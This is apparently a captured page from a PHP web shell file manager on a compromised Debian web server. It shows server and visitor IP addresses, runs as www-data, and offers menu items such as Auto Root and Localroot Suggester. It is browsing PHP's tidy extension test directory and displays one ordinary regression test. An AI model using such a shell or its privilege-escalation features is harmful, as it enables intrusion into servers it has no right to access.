Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
ext /
tidy /
tests /
Delete
Unzip
Name
Size
Permission
Date
Action
001.phpt
191
B
-rw-rw-r--
2022-10-31 11:36
002.phpt
259
B
-rw-rw-r--
2022-10-31 11:36
003.phpt
298
B
-rw-rw-r--
2022-10-31 11:36
004.phpt
830
B
-rw-rw-r--
2022-10-31 11:36
005-mb.phpt
290
B
-rw-rw-r--
2022-10-31 11:36
005.html
14
B
-rw-rw-r--
2022-10-31 11:36
005.phpt
254
B
-rw-rw-r--
2022-10-31 11:36
005私はガラスを食べられます.html
14
B
-rw-rw-r--
2022-10-31 11:36
006.phpt
503
B
-rw-rw-r--
2022-10-31 11:36
007.html
15
B
-rw-rw-r--
2022-10-31 11:36
007.phpt
867
B
-rw-rw-r--
2022-10-31 11:36
008.phpt
513
B
-rw-rw-r--
2022-10-31 11:36
009.phpt
249
B
-rw-rw-r--
2022-10-31 11:36
010.phpt
5.42
KB
-rw-rw-r--
2022-10-31 11:36
011.phpt
526
B
-rw-rw-r--
2022-10-31 11:36
012.phpt
7.7
KB
-rw-rw-r--
2022-10-31 11:36
013.html
15
B
-rw-rw-r--
2022-10-31 11:36
013.phpt
280
B
-rw-rw-r--
2022-10-31 11:36
014.phpt
347
B
-rw-rw-r--
2022-10-31 11:36
015.html
15
B
-rw-rw-r--
2022-10-31 11:36
015.phpt
326
B
-rw-rw-r--
2022-10-31 11:36
016.html
57
B
-rw-rw-r--
2022-10-31 11:36
016.phpt
358
B
-rw-rw-r--
2022-10-31 11:36
016.tcfg
11
B
-rw-rw-r--
2022-10-31 11:36
017.phpt
271
B
-rw-rw-r--
2022-10-31 11:36
018.phpt
293
B
-rw-rw-r--
2022-10-31 11:36
019.phpt
1.2
KB
-rw-rw-r--
2022-10-31 11:36
020.phpt
643
B
-rw-rw-r--
2022-10-31 11:36
021.phpt
534
B
-rw-rw-r--
2022-10-31 11:36
023.phpt
877
B
-rw-rw-r--
2022-10-31 11:36
024.phpt
757
B
-rw-rw-r--
2022-10-31 11:36
025.phpt
885
B
-rw-rw-r--
2022-10-31 11:36
026.phpt
282
B
-rw-rw-r--
2022-10-31 11:36
027.phpt
1.62
KB
-rw-rw-r--
2022-10-31 11:36
028.phpt
346
B
-rw-rw-r--
2022-10-31 11:36
029.phpt
425
B
-rw-rw-r--
2022-10-31 11:36
030.phpt
564
B
-rw-rw-r--
2022-10-31 11:36
031.phpt
385
B
-rw-rw-r--
2022-10-31 11:36
032.phpt
350
B
-rw-rw-r--
2022-10-31 11:36
033.phpt
356
B
-rw-rw-r--
2022-10-31 11:36
034.phpt
429
B
-rw-rw-r--
2022-10-31 11:36
035.phpt
309
B
-rw-rw-r--
2022-10-31 11:36
bug54682.phpt
262
B
-rw-rw-r--
2022-10-31 11:36
bug77040.phpt
641
B
-rw-rw-r--
2022-10-31 11:36
bug77594.phpt
301
B
-rw-rw-r--
2022-10-31 11:36
bug_50558.phpt
424
B
-rw-rw-r--
2022-10-31 11:36
tidy_error.phpt
707
B
-rw-rw-r--
2022-10-31 11:36
tidy_error1.phpt
453
B
-rw-rw-r--
2022-10-31 11:36
uninitialized.phpt
539
B
-rw-rw-r--
2022-10-31 11:36
Save
Rename
--TEST-- Bug: tidy segfaults with markup=false --SKIPIF-- <?php if (!extension_loaded('tidy')) die('skip'); ?> --FILE-- <?php // bug report from http://sf.net/tracker/?func=detail&atid=390963&aid=1641868&group_id=27659 abstract class BaseClass { private static $tidyconfig; public function __construct() { self::$tidyconfig = array( 'indent' => false, 'clean' => true, 'merge-divs' => false, 'quote-marks' => true, 'drop-empty-paras' => false, 'markup' => false, 'output-xhtml' => true, 'wrap' => 0); } abstract public function run(); public function getURL($url) { $data = "awerawer"; // in my code, $data is downloaded from a site $tidy = new tidy; $tidy->parseString($data, self::$tidyconfig, 'utf8'); $tidy->cleanRepair(); return $tidy; } } class ChildClass extends BaseClass { public function __construct() { parent::__construct(); } public function run() { $result = $this->getURL('awer'); if ($result === null) { echo "\tError:\n"; } var_dump((string)$result); } } $instance = new ChildClass(); $instance->run(); ?> --EXPECT-- string(0) ""